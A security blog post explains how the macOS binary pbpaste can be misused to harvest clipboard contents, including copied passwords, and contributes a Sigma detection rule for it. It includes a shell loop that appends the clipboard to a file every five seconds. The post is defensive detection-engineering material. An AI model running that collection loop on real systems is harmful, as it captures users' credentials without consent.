Living-off-the-Land: Exploring macOS LOOBins and Crafting Detection Rules - pbpaste

Exploring lesser known Living-off-the-Orchard Binaries and creating Sigma rules for detection

LOL Overview

For an overview of Living-off-the-Land/Living-off-the-Orchard, see my post here

For the previous write-up on ‘tmutil’, see the post here

pbpaste

The ‘pbpaste’ binary is used to paste the contents of the clipboard (also known as the pasteboard).

Excerpt from LOOBins

Normal Usage

macOS Users can take whatever has been ‘copied’ (whether a right-click>copy, cmd+c, or output from a previous command) and do a ‘paste’ operation with the ‘pbpaste’ binary.

Note: there is also a ‘pbcopy’ binary that achieves a similar ‘copy’ operation.

Misuse

As you can imagine, the ‘pbpaste’ binary can be used by an attacker to capture sensitive information - including passwords, usernames, bank account numbers, etc. anything that the user has copied.

One key point covered in this article is that password managers will “rely on the operating system’s clipboard to securely move credentials from the password vault to the web browser. It’s within these few seconds that an attacker can dump the clipboard contents and exfiltrate passwords.”

Also of note, there are no special privileges required to use this binary.

Example Commands

Any Mac user can test this out. Simply copy any text, open a terminal, and enter:

pbpaste

In this example, I copied the previous line:

Paste Clipboard to a File

To demonstrate another simple example, this is how one could direct the contents of the clipboard to a file using ‘pbpaste’ -

pbpaste > contents.txt

In this case, anyone could open the “contents.txt” file and view the output from the clipboard.

Continuous Collection

In a similar manner, an attacker with access to the system could execute a continuous collection of the clipboard content by implementing ‘pbpaste’ within a loop.

This particular example will insert the contents of the clipboard into the “contents.txt” file every 5 seconds -

while true; do echo $(pbpaste) >> contents.txt; sleep 5; done   

Detection Opportunities

There were previously no existing Sigma Rules to detect this behavior with the ‘pbpaste’ binary. To help out with this, I went ahead and crafted a simple Sigma Rule to contribute to the Master Repository. Note: My contribution is currently pending - I’ll update this post with the final link. Here is the draft detection rule:

title: Clipboard Data Collection Via Pbpaste
id: d8af0da1-2959-40f9-a3e4-37a6aa1228b7
status: experimental
description: Detects possible collection of data from the clipboard via execution of the pbpaste binary
references:
    - https://www.loobins.io/binaries/pbpaste/
    - https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b
author: Daniel Cortez
date: 2024/05/01
tags:
    - attack.collection
    - attack.t1115
    - attack.credential_access
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        Image|endswith: '/pbpaste'
    condition: selection
falsepositives:
    - Legitimate administration activities
level: medium

This rule is looking for:

1. Process Creation events

2. on macOS

3. Using the ‘pbpaste’ binary

Since it is possible that these activities could be carried out legitimately by a User/Administrator, that is noted under the false positives section.